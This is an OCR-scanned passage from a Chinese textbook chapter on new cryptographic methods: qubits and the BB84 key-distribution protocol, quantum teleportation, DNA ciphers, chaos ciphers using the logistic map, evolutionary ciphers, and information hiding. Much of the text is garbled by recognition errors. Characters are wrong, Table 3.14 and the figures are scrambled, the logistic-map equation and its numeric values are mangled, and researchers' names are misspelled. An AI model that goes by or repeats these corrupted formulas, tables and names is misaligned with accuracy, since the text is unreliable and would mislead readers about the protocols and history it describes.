量子 信息 的 单元 称 为 量子 位 (Qubit) , 它 是 两 个 逻辑 态 的 琶 加 态 。 经 典 位 可 以 看 成 是 量 
子 位 的 特例 ,是 一 个 两 态 系统 , 它 可 以 制备 为 两 个 可 识别 状态 中 的 一 个 ,如 是 或 非 , 真 或 假 ,0 
或 1。 用 量子 态 来 表示 信息 是 量子 信息 的 出 发 点 ,有 关 信 息 的 所 有 问题 都 必须 采用 量子 力 
学 理论 来 处 理 , 信 息 的 演变 遵从 薛 定 刘 方 程 ,信息 传输 就 是 量子 态 在 量子 通道 中 的 传送 , 信 
息 处 理 ( 计 算 ) 是 量子 态 的 么 正 变换 ,信息 提取 便 是 对 量子 系统 实行 量子 测量 。 

在 实验 中 任何 两 态 的 量子 系统 都 可 以 用 来 制备 成 量子 位 ,常见 的 有 光子 的 正 交 偏振 态 、 
电子 或 原子 核 的 自 旋 、 原 子 或 量子 点 的 能 级 ,任何 量子 系统 的 空间 模式 等 。 信 息 一 旦 量子 
化 ,量子 力学 的 特性 便 成 为 量子 信息 的 物理 基础 ,主要 有 : 

(1) 量子 态 的 有 秋 加 性 。 量 子 信息 可 以 同时 输入 或 操作 N 个 量子 位 的 释 加 态 。 

(2) 量子 相干 性 。 量 子 干涉 现象 成 为 量子 信息 诸多 特性 的 重要 物理 基础 。 

(3) 量子 纠缠 性 。N( 大 于 1) 的 量子 位 可 以 处 于 量子 纠缠 态 , 对 其 中 某 个 子 系统 的 局 域 
操作 会 影响 到 其 余子 系统 的 状态 。 

(4) 量子 不 可 克隆 定理 。 量 子 力学 的 线性 特性 禁止 对 任意 量子 态 实行 精确 的 复制 ,这 
个 定理 和 不 确定 性 原理 构成 量子 密码 术 的 物理 基础 。 

2. 量子 密码 

量子 密码 是 密码 学 与 量子 力学 结合 的 产物 , 它 利用 了 系统 所 具有 的 量子 性 质 实现 密码 
思想 的 一 种 新 型 密码 体制 。 量 子 密码 在 理论 上 是 绝对 安全 的 ,无 论 窃听 者 拥有 多 好 的 经 典 
或 量子 计算 机 。 量 子 密 钥 分 发 系统 不 需要 量子 计算 机 ,其 至 不 需要 量子 存储 器 ,唯一 需要 的 
仅 是 量子 态 制备 ,传送 与 测量 。 但 量子 的 通信 征 一 个 必须 解决 的 问题 。 由 于 现 有 的 大 部 分 
量子 通信 是 通过 光纤 传输 的 ,而 光纤 本 身 结构 的 缺陷 及 外 界 对 光纤 的 扭曲 .旋转 都 会 使 信息 
失真 ,导致 量子 密码 加 /解密 信息 的 错误 ,大 大 降低 了 密码 的 产生 效率 。 

量子 密码 术 的 主要 目的 是 提供 一 种 能 够 生成 安全 密 钥 的 协议 ,并 将 协议 推广 应 用 。 量 
子 密码 的 基本 原理 是 不 干扰 系统 则 无 法 对 该 系统 进行 测量 ,除非 此 次 测量 与 系统 量子 态 是 
相 容 的 。 如 Alice 与 Bob 进行 通信 ,Eve 是 窃听 者 。 如 果 Alice 与 Bob 之 间 使 用 分 立 光子 作 
为 信息 的 载体 , 且 携 带 量子 信息 ,Eve 在 不 引入 干扰 的 情况 下 将 得 不 到 信息 。Alice 用 单 光 
子 编码 ,并 将 其 发 送 给 Bob, 若 Bob 收 到 的 光子 未 受 干扰 , 则 可 知 光子 未 被 测量 , 即 Eve 没 得 
到 光子 的 任何 信息 。 交 换 光 子 信息 后 ,Alice 和 Bob 可 以 检查 是 否 有 人 窃听 ,随机 抽出 一 组 
数据 的 子 集 在 公共 信息 进行 比较 , 若 Bob 的 子 集 未 被 干扰 , 则 无 干扰 未 被 测量 , 即 没有 窃 
听 。 可 见 , 此 密 钥 分 发 方案 不 仅 能 防止 Eve 窃听 密 钥 ,而且 能 发 现 Eve 窃听 ,充分 保证 了 密 
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钥 的 安全 性 。 

1) 量子 密 钥 分 发 BB84 协议 

BB84 协议 密码 术 与 经 典 密码 的 最 大 区 别 是 它 能 抵挡 任何 破译 技术 和 计算 工具 的 攻击 
原因 在 于 它 的 安全 性 是 由 物理 定律 来 保证 ,而 不 是 靠 某 种 高 复杂 的 运算 。 

假定 Alice 和 Bob 约定 用 线 偏 振 量 和 圆 偏振 量 的 4 个 偏振 态 来 实现 量子 密 钥 分 配 ,用 
二 表示 右 旋 圆 偏振 量 ; > 表示 左旋 圆 偏 振 量 ; 一 表示 水 平 线 偏振 量 ; | 表示 垂直 线 偏 振 量 。 
采用 线 偏 振 基 (十 ) 和 圆 偏振 基 (O) 来 测量 光子 的 偏振 态 。 规 则 如 下 : 


量子 偏振 态 与 测量 基 序列 如 表 3. 14 所 示 ,操作 步 又 如 下 : 
表 3.14 量子 偏振 态 与 测量 基 选 择 


和 3 4 5 6 7 8 9 10 
(1) > < | | < 一 < | < | 
(2) 十 0 0 于 十 十 十 十 + 0 
(3) 一 < < | | 二 | | | < 
(4) 沁 基 X 
(5) 0 1 0 让 


(1) Alices 随机 地 发 给 Bob 一 组 光子 。 

(2) Bob 随机 地 选择 十 .O 接收 光子 ,并 测量 光子 的 偏振 态 (1/2 选 对 ,也 就 是 1/2 
测 对 ) 。 

(3) Bob 得 到 光子 的 实际 偏振 方向 ,只 有 Bob 知道 。 

(4) Bob 告诉 Alice 自己 选择 的 测量 基 , 即 表 3. 14 中 (2) 的 偏振 基 序列 。 结 果 不 告 诉 
Alice。Alice 告诉 Bob 哪些 测量 基 是 正确 的 ,并 保留 下 来 ,其 余 的 去 掉 。 若 超过 mx/10 不 正 
确 , 实 验 失 败 。 

(5) Aice 和 Bob 仅 保留 了 相同 基 时 的 态 , 即 表 3. 14 中 的 (4)。 双 方 随机 地 公开 其 中 的 
一 部 分 态 , 若 存 在 不 一 致 ,就 说 明 有 窃听 ; 若 一 致 , 剩 下 的 态 转换 二 进 制 数 序列 。 如 过 | 表示 
1,> 一 表示 0。 这 样 就 得 到 了 量子 密 钥 。 

安全 性 讨论 : 若 存在 第 三 方 对 光子 的 测量 ,那么 根据 测 不 准 原理 ,必然 会 导致 光子 极 化 
态 的 改变 ,并 影响 Bob 的 测量 结果 。 这 样 在 (5) 的 比 对 过 程 中 就 会 出 现 不 一 致 ,哪怕 是 一 个 
不 同 , 都 说 明 信 道 被 窃听 。 

上 述 密 钥 分 配 的 缺陷 是 光 的 偏振 特性 在 长 距离 的 光纤 传输 中 会 逐渐 退化 ,造成 的 误 码 
率 增加 。 现 在 解决 的 办 法 是 基于 量子 纠缠 和 EPR 效应 。 目 前 最 主流 的 实验 方案 是 用 光子 
的 相位 特性 进行 编码 (B92 协议 )。 
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2) 量子 隐形 传 态 

量子 隐形 传 态 (Quantum Teleportation ,QT) 一 一 无 影 无 踪 的 传送 过 程 , 它 把 一 个 物理 
客体 等 同 于 构造 该 客体 的 全 部 信息 ,传递 客体 只 需 传递 它 的 信息 ,而 不 是 搬运 该 客体 。 在 传 
统 物理 里 面 经 过 精确 的 测量 ,可 以 复制 一 个 完全 一 样 的 物体 ,但 是 在 量子 物理 里 面 ,由 于 量 
子 力学 的 不 确定 性 原理 不 允许 精确 测量 ,就 不 可 能 提取 原 物 的 全 部 信息 ,精确 复制 量子 态 的 
设想 违背 了 量子 不 可 克隆 定理 ( 测 不 准 原理 的 一 个 推论 ) 。 因 此 ,将 任意 位 置 的 量子 态 完 整 
地 从 一 方 传递 到 另 一 方 只 是 一 种 幻想 。 

Bennett 的 QT 方案 的 基本 思想 是 为 实现 传送 某 个 物体 的 未 知 量子 态 ,可 将 原 物 的 信息 
分 成 经 典 和 量子 信息 部 分 ,分 别 由 经 典 通道 和 量 Alice 吉 册 Bob 
子 通道 传送 给 接收 者 。 经 典 信息 是 发 送 者 对 原 物 一 
进行 某 种 测量 而 获得 的 ,量子 信息 是 发 送 者 在 测 
量 中 未 提取 的 其 余 信息 ,接收 者 在 获得 两 种 信息 jf EE 
后 ,就 可 以 制造 出 与 原 物 完全 相同 的 量子 态 。 量 EPR 源 
子 隐形 传 态 原理 如 图 3. 21 所 示 。 图 3.21 量子 隐形 传 态 原理 图 

(1) 制备 EPR 纠缠 对 一 一 粒子 2 与 粒子 3 ,两 
个 粒子 处 于 纠缠 态 。 

(2) Alice 对 粒子 1 和 粒子 2 进行 Bell 联合 测量 ,将 有 1/4 几率 得 到 每 个 Bell 基 , 但 是 
每 次 测量 只 能 得 到 其 中 的 一 个 基 。 一 旦 Alice 测量 了 4 个 Bell 基 中 的 某 个 ,粒子 3 就 已 经 
藤 缩 到 相应 的 量子 态 。Alice 将 此 结果 ( 即 已 经 测量 到 的 那个 Bell 基 ) 通 过 经 典 信道 告诉 
Bob( 由 于 需要 使 用 经 典 信道 ,量子 传输 不 可 能 达到 光速 ) 。 

(3) Bob 基于 Alice 测 得 的 结果 , 便 选 取 相 应 的 么 正 变换 对 粒子 3 进行 操作 ,这 样 粒子 3 
就 处 在 原始 的 状态 了 。 

需要 解决 的 关键 技术 : EPR 纠缠 对 的 制备 ,Bell 基 的 联合 测量 、 任 意 的 么 正 变换 操作 。 
最 重要 的 关键 和 难点 是 高 纠缠 的 稳定 高 效 的 EPR 光子 纠缠 源 的 制备 。 

3. 量子 密码 的 发 展 

美国 科学 家 威 斯 纳 (Wiesnerl) 在 1970 年 将 量子 物理 用 于 密码 术 ,指出 可 利用 单 量 子 态 
制造 不 可 伪造 的 “电子 钞票 ”", 但 需要 长 时 间 保 存单 量子 态 不 太 现实 。1984 年 , Bennett 和 
Brassard 提出 了 第 一 个 量子 密 钥 分 发 方案 , 称 为 BB84 方案 ,其 安全 性 基于 量子 力学 基本 原 
理 ,是 绝对 安全 的 。1991 年 ,Eken 提出 了 一 种 基于 双 光 子 纠缠 量子 态 与 Bell 不 等 式 的 EPR 
(Einstein-Podolsky-Rosen) 协 议 。Bennett 又 于 1992 年 提出 了 一 种 基于 两 个 非 下 次 量子 态 
的 协议 , 即 B92 协议 。 这 三 个 协议 是 量子 密码 术 的 三 个 基本 协议 。 

在 量子 保密 通信 的 研究 上 ,1997 年 奥地利 Innsbruck 大 学 在 《Nature) 杂 志 上 发 表 了 “ 量 
子 隐形 传 态 实验 ”的 试验 研究 成 果 。2004 年 ,Gobby 使 量子 通信 距离 达到 122km, 量 子 位 错 
误 率 为 8.9%。2004 年 ,chip Elliott 在 剑桥 建立 和 运行 了 第 一 个 量子 保密 的 计算 机 网 络 。 
2005 年 , 潘 建 伟 教授 等 称 实现 了 13 公里 自由 空间 纠缠 光子 分 发 ,2006 年 又 在 光纤 通信 中 实 
现 了 一 种 抗 干扰 的 量子 密码 分 配方 案 , 保 证 了 长 距离 光纤 量子 通信 的 安全 和 质量 。2007 
年 ,中 国 科学 院 院 士 郭 光 灿 提出 概率 量子 克隆 原理 ,并 推导 出 最 大 克隆 效率 公式 ,被 称 为 
“ 段 - 郭 概 率 克隆 机 ”“ 段 - 郭 界限 ”, 成 为 两 种 不 同类 型 的 最 好 克隆 机 之 一 ,并 在 实验 室 研 制 
成 功 概率 量子 克隆 机 和 普 适 量子 克隆 机 ;提出 量子 避 错 编码 原理 ,成 为 三 种 不 同 原理 的 量子 
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编码 之 一 ;用 线性 分 束 耦 合 器 形成 多 个 输出 口 ,将 光 强 的 时 序 衰减 变 为 光 强 沿 输出 口 的 空间 
分 布 , 研 制 出 量子 保密 通信 用 的 精密 控制 强 衰减 器 ;利用 自主 创新 的 量子 路 由 器 ,率先 完成 
四 用 户 量子 密码 通信 网 络 的 测试 。 

4. 量子 密码 的 应 用 

量子 密码 与 传统 数学 密码 的 理论 基础 不 同 ,其 相关 的 研究 及 研制 得 到 了 迅速 的 发 展 , 逐 
步 走向 了 应 用 ,其 主要 表现 在 以 下 三 方面 : 

(1) 量子 密码 与 数学 密码 相 结合 提供 更 安全 的 密码 系统 。 如 利用 量子 密码 技术 获得 安 
全 密 钥 或 随机 数 的 方法 ,解决 了 一 些 数学 上 不 能 解决 的 问题 。 

(2) 量子 密码 与 现代 通信 系统 的 结合 成 为 量子 密码 的 一 个 新 应 用 点 ,如 量子 网 络 的 试 
验 ,可 以 大 大 提高 网 络 通信 的 安全 性 。 

(3) 量子 密码 还 可 形成 独立 的 安全 系统 ,如 单 光 子 检测 器 .量子 身份 认证 系统 等 。 量 子 
密码 的 安全 性 非常 独特 ,但 由 于 设备 的 昂贵 较 低 的 速率 和 传输 的 距离 问题 ,使 得 量子 密码 
的 真正 应 用 还 有 一 段 距离 。 期 待 有 更 好 的 协议 及 更 新 的 技术 来 克服 这 些 局 限 性 ,并 能 结合 
现 有 的 密码 技术 ,使 量子 密码 的 最 大 优势 发 挥 出 来 。 


3.5.2 DNA 密码 


DNA 除了 可 以 用 于 研究 生物 遗传 外 ,也 可 以 用 于 信息 科学 领域 。 DNA 密码 是 近年 来 
出 现 的 密码 学 新 领域 ,是 信息 科学 与 生物 技术 发 展 的 结合 。 其 特点 是 以 DNA 为 信息 载体 ， 
充分 利用 DNA 固有 的 高 存储 密度 和 高 并 行 性 等 优点 ,实现 加 密 及 认证 签名 等 密码 学 功能 。 

1. DNA 计算 

DNA 具有 超大 规模 并 行 性 、 超 高 容量 的 存储 密度 以 及 超 低 的 能 量 消耗 ,非常 适用 于 信 
息 领 域 ,利用 DNA 可 能 生产 出 新 型 的 超级 计算 机 。1994 年 11 月 ,美国 计算 机 科学 家 工 . 
AdtemaN 在 美国 (科学 》 上 运用 DNA 计算 机 解决 了 一 个 7 节点 有 向 哈密 顿 路 径 问题 ,标志 
着 DNA 计算 的 出 现 ;Lipton. R 在 1995 年 利用 DNA 试验 解决 了 著名 的 计算 机 科学 中 的 
NP 完全 问题 一 一 SAT 问题 ;1998 年 Narayanan A 利用 DNA 算法 计算 了 TSP 最 短路 径 
问题 。 

DNA 计算 使 得 计算 不 再 是 一 种 物理 性 质 的 符号 变换 ,而 是 化 学 性 质 的 切割 和 粘贴 插 
入 和 删除 。 和 传统 电子 计算 机 相 比 ,DNA 计算 从 理念 上 提供 了 一 个 革命 性 的 计算 方法 。 
DNA 计算 的 许多 领域 与 功能 基因 组 学 相 结合 ,甚至 有 些 基 本 的 DNA 计算 研究 可 以 直接 应 
用 到 基因 组 分 析 中 。 不 过 ,目前 DNA 计算 机 能 够 处 理 的 问题 还 仅仅 是 利用 分 子 技术 解决 
的 几 个 特定 问题 , 属 一 次 性 实验 ,DNA 计算 机 还 没有 一 个 固定 的 程式 。 

2. DNA 密码 体制 

2004 年 , 伐 妮 妮 提 出 的 一 种 基于 基因 重组 的 DNA 密码 体制 ,其 研究 性 方案 设计 如 下 : 

加 密 过 程 是 将 明文 信息 编码 成 目的 基因 ,通过 重组 DNA 实验 ,把 带 有 目的 基因 的 
DNA 片段 及 载体 分 别 选择 合适 条 件 ( 该 条 件 作为 密 钥 ) 进 行 剪接 处 理 , 并 连接 获得 重组 环 状 
DNA 分 子 (载体 性 质 和 连接 位 置 作为 密 钥 ) ,该 重组 环 状 DNA 分 子 即 为 密 文 ;再 将 各 种 类 
型 的 环 状 DNA 分 子 进行 二 进 制 序列 代数 编码 ,通过 通信 信道 传送 到 接收 端 。 其 中 目的 基 
因应 作为 私有 密 钥 进行 保密 ,实现 重组 DNA 的 实验 条 件 作 为 加 密 密 钥 , 加 密 密 钥 通过 安全 
通道 传送 到 接收 端 。 
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解密 时 将 接收 的 二 进 制 密 文 信息 进行 代数 解码 ,获得 多 种 类 型 的 环 状 DNA 分 子 , 再 利 
用 加 密 密 钥 通过 分 子 生物 学 实验 将 各 种 类 型 的 DNA 分 子 转 导入 宿主 细胞 ,通过 在 合适 条 
件 下 培养 ,大量 扩 增 、 繁 殖 ( 若 培养 条 件 选 择 的 适当 , 则 只 有 含 目 的 基因 的 细胞 才能 生长 ) ,对 
能 生长 的 细胞 进行 筛选 ,筛选 出 仅 含 有 目的 基因 的 细胞 进行 分 离 纯化 等 实验 ,提取 出 目的 基 
因 , 译 码 后 获得 明文 信息 。 由 于 接收 端 使 用 加 /解密 密 钥 相同 ,因此 该 密码 体制 是 一 种 对 称 
密码 。 

3. DNA 密码 的 发 展 

由 于 DNA 计算 的 并 行 性 与 超大 容量 的 特性 ,DNA 非常 适合 密码 术 的 攻击 。DanBoneh 
等 在 1995 年 用 DNA 计算 机 破译 了 少 于 64 位 密 钥 的 DES。1999 年 ,Gehani 等 人 提出 
DNA 一 次 一 密 的 加 密 方案 ,提高 了 安全 性 。Celland 于 1999 年 利用 DNA 进行 信息 隐藏 。 

由 于 DNA 计算 具有 超大 规模 并 行 性 ,牺牲 化 学 特性 等 ,DNA 密码 具有 加 /解密 快 、 高 
密度 存储 等 特性 。DNA 密码 的 安全 性 不 再 依赖 于 数学 难题 ,而 且 对 量子 计算 机 这 样 计算 能 
力 的 攻击 免疫 。DNA 密码 很 可 能 会 成 为 新 一 代 密 码 系 统 , 而 且 能 与 传统 的 密码 及 其 他 新 型 
密码 结合 应 用 。 


3.5.3 混沌 密码 


1. 混沌 系统 的 基本 概念 

20 世纪 60 年 代 人 们 发 现 有 一 些 系统 ,虽然 描述 它们 的 方程 是 确定 的 ,但 系统 对 初 值 有 
极 强 的 敏感 性 , 即 初 值 上 有 极 微小 的 变化 (如 10 局 ) ,将 引起 系统 后 来 不 可 预测 的 改变 。 著 名 
的 “蝴蝶 效应 ” 即 是 一 个 形象 的 例子 ,从 物理 上 看 运动 似乎 是 随机 的 。 这 种 对 初 值 的 敏感 性 ， 
或 者 说 确定 性 系统 内 在 的 随机 性 就 是 混沌 。 

混沌 系统 是 一 种 高 度 复杂 的 非 线 性 动态 系统 ,具有 对 初始 条 件 和 混沌 参数 非常 敏感 ,以 
及 生成 的 混沌 序列 具有 非 周期 性 和 伪 随 机 性 的 特性 。 描 述 混沌 系统 模型 的 方程 有 非 线 性 迭 
代 方 程 (组 ) , 非 线性 自治 微分 方程 组 和 差分 微分 方程 (组 ) 。 

例如 Logistic 映射 方程 。 由 于 虫口 种 群 的 数目 受 食物 和 生存 空间 的 约束 及 疾病 的 传染 
等 影响 都 会 引起 其 数目 的 减少 ,改进 后 的 Logistic 虫口 方程 用 式 zx,41 二 ux, (1 一 zx, ) 来 表示 。 
该 方程 是 一 个 迭代 方程 。 当 wx 王 2. 60,X。 二 0.5 时 ,其 运动 后 的 值 为 : 

Xi 一 0. 65000000000000002，X; 一 0. 59150000000000003,，… ,Xe6; 三 0. 61538461538461542 

当 x>>67 时 ,zx 值 的 序列 z, 收敛 到 一 个 固定 的 值 0. 61538461538461542; 而且 ze 的 改 
变 不 能 引起 收敛 值 的 改变 ,这 个 收敛 值 称 为 奇怪 吸引 子 。 但 是 改变 值 则 会 出 现 另 一 种 
情况 。 

当 xv 一 3.2,Xo 一 0. 60 时 ,Xi = 二 0.76800000000000002,X; 二 0.57016319999999998,*…， 
Xu 二 0. 51304450953262981, Xss 二 0.79945549046737008, 当 nn 之 44 时 ,人 迭代 后 出 现 两 个 奇 
怪 吸 引子 ,也 称 为 周期 2 轨迹 。 

而 且 由 实验 可 知 , 当 vx 值 逐 渐 增 加 时 ,就 会 出 现 4.8、16… 个 吸引 子 。 直 到 v 之 3. 5699， 
进入 了 非 周期 状态 ,此 非 周期 区 域 称 为 混沌 区 。 

2. 混沌 密码 的 加 密 / 解 密 原理 

混沌 密码 的 加 /解密 原理 如 图 3. 22 所 示 , Ki 、K, 分别 是 加 密 密 钥 和 解密 密 钥 。 加 密 和 
解密 是 两 个 独立 的 、 完 全 相同 的 混沌 系统 ,两 系统 间 不 存在 耦合 关系 。 混 沌 密码 的 安全 性 依 
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赖 于 混沌 信号 的 长 周期 类 随机 性 和 混沌 系统 对 初 值 .参数 的 敏感 性 。 


| 一 一 | 混沌 信号 发 生 器 一 | 混沌 信号 序列 一 >| 明文 序列 


密 文 序列 | 


上 [一 一 | 混沌 信号 发 生 器 一 | 混沌 信号 序列 一 | 密 文 序列 
图 3.22 混沌 密码 加 解密 原理 


1 


明文 序列 ] 


混沌 密码 体制 是 对 称 密码 体制 ,其 加 密 /解密 的 基本 原理 与 传统 的 对 称 密码 加 密 类 似 ， 
仅 是 对 密 钥 经 过 了 混沌 处 理 , 使 之 成 为 具有 混沌 信号 的 随机 性 特点 。 

混沌 加 密 主要 是 利用 由 混沌 系统 迭代 产生 的 序列 ,作为 加 密 变 换 的 一 个 因子 序列 。 混 
沌 加 密 的 理论 依据 是 混沌 的 自 相似 性 ,使 得 局 部 选取 的 混沌 密 钥 集 在 分 布 形态 上 都 与 整体 
相似 。 由 于 混沌 系统 对 初始 状态 高 度 的 敏感 性 ,复杂 的 动力 学 行为 ,分 布 上 不 符合 概率 统计 
学 原理 ,是 一 种 拟 随机 的 序列 ,其 结构 复杂 ,可 以 提供 具有 良好 的 随机 性 .相关 性 和 复杂 性 的 
拟 随机 序列 ,使 混沌 系统 难以 重 构 ,分析 和 预测 。 所 以 混沌 加 密 的 基本 原理 主要 是 利用 混沌 
系统 对 初 值 的 极端 敏感 性 和 自身 具有 高 度 的 随机 性 两 种 特性 ,使 得 密 钥 的 产生 具有 更 好 的 
随机 性 特征 。 即 使 破译 者 已 知 产生 混沌 序列 的 方程 ,由 于 计算 机 的 精度 误差 及 有 理 数 的 稠 
密 性 ,也 难以 猜测 混沌 序列 的 参数 及 初 值 。 

3. 混沌 密码 的 安全 性 

混沌 密码 具有 保密 性 强 , 随 机 性 好 , 密 钥 量 大 ,产生 速度 快 ,更 换 密 钥 方便 等 特点 ,在 海 
量 数 据 加 密 、 抗 干扰 性 截获 率 , 信 号 隐蔽 等 方面 具有 充分 的 优势 。 由 于 混沌 系统 对 初始 值 
和 参数 的 敏感 性 ,可 提供 很 大 的 密 钥 空 间 ; 由 于 混沌 的 遍历 特性 ,可 使 密 钥 在 密 钥 空间 中 均 
匀 分 布 ,近似 于 随机 序列 ,使 得 混沌 密码 通 近 了 “一 次 一 密 ”。 在 计算 时 间 上 ,混沌 加 密实 际 
上 属于 流 密码 的 范畴 ,加 密 时 只 对 数据 进行 异 或 操作 ,因而 运算 速度 比分 组 密码 的 速度 更 
快 ;通过 循环 产生 密 钥 流 ,需要 寄存 的 变量 有 限 ,其 运行 时 占用 的 空间 很 少 。 混 沌 加 密 算法 
可 以 用 来 加 密 和 解密 ,同时 也 可 以 直接 用 作 随 机 数 发 生 器 。 

当前 混沌 加 密 算 法 的 不 足 有 : 无 法 保证 每 个 实现 序列 的 长 周期 性 和 高 复杂 性 ;精度 有 
限 , 因 而 应 用 困难 ;高 数字 精度 对 付 选择 明文 攻击 能 力 很 差 ;序列 密 钥 不 易 管理 。 

常用 攻击 方法 包括 : 

(1) 多 分 辨 率 攻击 方法 。 能 有 效 地 降低 密 钥 焙 ,但 所 需 明 文 量 和 计算 复杂 性 都 很 大 。 

(2) 分 割 攻击 方法 。 利 用 不 太 长 的 乱 数 序列 大 大 降低 了 对 混沌 密码 攻击 的 计算 复 
杂 性 。 
(3) 相关 密 钥 攻击 方法 。 将 线性 密码 分 析 与 对 分 割 攻 击 方法 相 结 合 , 提高 了 分 割 攻 刘 
的 效率 ,克服 了 分 割 攻击 方法 的 上 述 局 限 性 。 


3.5.4 演化 密码 


演化 计算 是 基于 自然 界 发 展 规律 的 一 种 通用 问题 求解 方法 , 它 有 高 度 并 行 、 自 学 习 等 计 
算 特 征 , 利 用 仿生 学 中 的 进化 理论 来 解决 复杂 问题 。 仿 生 学 将 自然 界 的 发 展 规律 应 用 于 对 
一 些 问题 的 求解 ,如 遗传 算法 , 蚁 群 算法 等 。 演 化 密码 即 是 将 密码 学 与 演化 计算 结合 起 来 的 
一 种 密码 ,其 设计 的 目标 即 是 使 密码 强度 越 来 越 强 。 演 化 密码 的 基本 原理 如 下 : 

设 巨 为 加 密 算 法 ,Ko ,Ki,…,K, 为 密 钥 ,M 为 明文 ,C 为 密 文 , 则 把 Mu ,M, ,…,M, 加 
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密 成 密 文 的 过 程 可 表示 为 C; 二 E(M;,K;) ,i 二 0,1,…,n, 在 这 一 过 程 中 加 密 算法 固定 不 变 。 
若 上 述 加 密 过 程 的 加 密 算法 已 也 不 断 变化 , 即 C; 二 Ei;(M;,K;) ,i 二 0,1,…,n, 其 中 E; 各 不 
相同 , 则 称 为 加 密 算 法 可 变 的 密码 。 

由 于 密 钥 变化 而 使 加 密 算法 的 性 能 更 好 ,从 而 自我 发 展 、 自 动 增强 。2003 年 , 张 焕 国 教 
授 等 对 DES 分 组 密码 的 核心 部 件 S 盒 组 进行 实际 演化 ,得 到 一 种 用 演化 方法 设计 S 盒 组 的 
方法 ,获得 了 一 批 性 能 优异 的 S 盒 组 ,从 而 增强 了 DES 密码 的 安全 强度 。2004 年 , 孟 庆 树 
等 演化 设计 出 几乎 所 有 的 6 元 Bent 函数 ,可 以 演化 设计 出 部 分 8 元 Bent 函数 。 


3.6 信息 隐藏 与 水 印 


3.6.1 信息 隐藏 


信息 隐藏 (Information Hiding), 也 叫 数 据 隐 藏 (Data Hiding)、 信息 伪装 
(Steganography)。 主 要 研究 如 何 将 某 一 机 密 信息 隐藏 于 另 一 公开 信息 的 载体 中 ,然后 通过 
公开 载体 的 信息 传输 来 传递 机 密 信息 。 这 里 的 载体 可 以 是 图 像 .音频 ,视频 ,文本 ,也 可 以 是 
信道 ,甚至 是 某 套 编码 体制 或 整个 系统 。 

对 信息 隐藏 而 言 ,攻击 者 难以 从 众多 的 公开 信息 中 判断 是 否 存在 机 密 信息 ,增加 截获 机 
密 信 息 的 难度 ,从 而 保证 机 密 信息 的 安全 。 信 息 之 所 以 能 够 隐藏 在 多 媒体 数据 中 主要 是 基 
于 两 个 事实 : 其 一 ,多 媒体 信息 本 身 存在 很 大 的 元 余 性 。 未 压缩 的 多 媒体 信息 的 编码 效率 
很 低 , 将 机 密 信息 嵌入 到 多 媒体 信息 中 进行 秘密 传送 ,不 会 影响 到 多 媒体 信息 本 身 的 传送 和 
使 用 。 其 二 ,人 类 的 听觉 和 视觉 系统 都 有 一 定 的 掩蔽 效应 。 这 种 掩蔽 性 将 信息 隐藏 而 不 被 
人 们 察觉 。 

1. 信息 隐藏 技术 的 特点 和 要 求 

信息 隐藏 与 密码 学 技术 不 同 。 信 息 隐藏 的 目的 不 在 于 限制 正常 的 资料 存 取 , 而 在 于 保 
证 隐藏 数据 不 被 侵犯 和 发 现 ,可 能 的 监测 者 或 非法 拦截 者 难以 从 公开 载体 中 判断 机 密 信息 
是 否 存 在 ,或 难以 截获 机 密 信息 ,从 而 保证 机 密 信 息 的 安全 。 因 此 ,信息 隐藏 技术 必须 使 机 
密 信息 对 正常 的 数据 操作 具有 免疫 能 力 ,必须 使 隐藏 信息 不 易 被 正常 的 数据 操作 (如 信号 变 
换 或 数据 压缩 ) 所 破坏 。 成 功 的 信息 隐藏 通常 需要 满足 以 下 技术 要 求 : 

(1) 透明 性 (Invisibility) 或 不 可 感知 性 (Imperceptibility)。 指 载体 在 隐藏 信息 前 后 没 
有 明显 的 差别 ,除非 使 用 特殊 手段 ,否则 无 法 感知 机 密 信息 的 存在 。 

(2) 鲁 棒 性 (Robustness) 。 指 隐藏 对 象 抗拒 常用 的 信号 处 理 操作 而 带 来 的 信息 破坏 能 
力 。 也 就 是 说 常用 的 信号 处 理 操作 不 应 该 引起 隐藏 对 象 的 信息 丢失 。 这 里 的 信号 处 理 操作 
包括 滤波 有 损 压 缩 打 印 ,扫描 、 几 何 变换 .D/A 或 A/D 转换 等 。 

(3) 安全 性 (Security)。 指 隐藏 算法 具有 较 强 的 抗 恶意 攻击 能 力 , 即 它 必须 能 够 承受 一 
定 程 度 的 人 为 攻击 ,而 使 嵌入 对 象 不 被 破坏 。 此 外 ,与 信息 加 密 一 样 ,信息 隐藏 技术 最 终 也 
需要 把 对 信息 的 保护 转化 为 对 密 钥 的 保护 。 

(4) 不 可 检测 性 (Undetectability) 。 指 隐藏 对 象 与 载体 对 象 需要 有 一 致 的 特性 ,例如 具 
有 一 致 的 噪声 统计 分 布 等 ,以 便 使 隐藏 分 析 者 无 法 判断 隐藏 对 象 中 是 否 隐藏 有 艇 和 人 对象。 

(5) 自 恢复 性 。 经 过 某 些 操作 或 变换 后 ,可 能 会 使 隐藏 对 象 产 生 较 大 的 破坏 。 如 果 只 
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从 留 下 的 片断 数据 , 仍 能 恢复 嵌入 信号 ,而 且 恢复 过 程 不 需要 载体 信号 ,就 是 自 恢复 性 。 

(6) 肉 入 强度 (信息 量 )。 载 体 中 应 能 隐藏 尽 可 能 多 的 信息 。 在 满足 不 可 感知 的 条 件 
下 ,隐藏 的 信息 越 多 , 鲁 棒 性 就 越 差 。 因 此 ,在 具体 的 隐藏 系统 中 通常 都 会 涉及 不 可 感知 性 、 
和 鲁 棒 性 和 嵌入 强度 随 三 者 之 间 的 折 中 。 

2. 信息 隐藏 的 通用 模型 

通用 模型 如 图 3. 23 所 示 。 其 中 被 隐藏 的 信息 称 为 秘密 信息 ,如 版 权 信息 、 秘 密 数 据 和 
软件 序列 号 等 。 而 用 于 隐藏 秘密 信息 的 公开 信息 称 为 载体 信息 ,如 视频 .图片 .音频 和 文本 
文件 等 。 信 息 的 隐藏 过 程 一 般 由 密 钥 控制 ,通过 嵌入 算法 将 秘密 信息 隐藏 于 公开 载体 信息 
中 。 再 将 隐藏 有 秘密 信息 的 公开 载体 信息 通过 网 络 等 不 安全 信道 传递 到 接收 方 ,接收 方 通 
过 检测 器 提取 算法 和 密 钥 从 载体 信息 中 恢复 出 秘密 信息 。 


载体 信息 7 秘密 信息 
从 入 算法 | “~ | 不 安全 信道 -| 提取 算法 

秘密 信息 | { 
秘 负 秘 钥 


图 3.23 信息 隐藏 通用 模型 


信息 隐藏 的 通用 模型 主要 由 下 述 两 部 分 组 成 

(1) 信息 嵌入 算法 。 利 用 密 钥 来 实现 秘密 信息 的 隐藏 。 

(2) 隐藏 信息 检测 与 提取 算法 。 利 用 密 钥 从 载体 信息 中 检测 并 提取 出 秘密 信息 。 在 密 
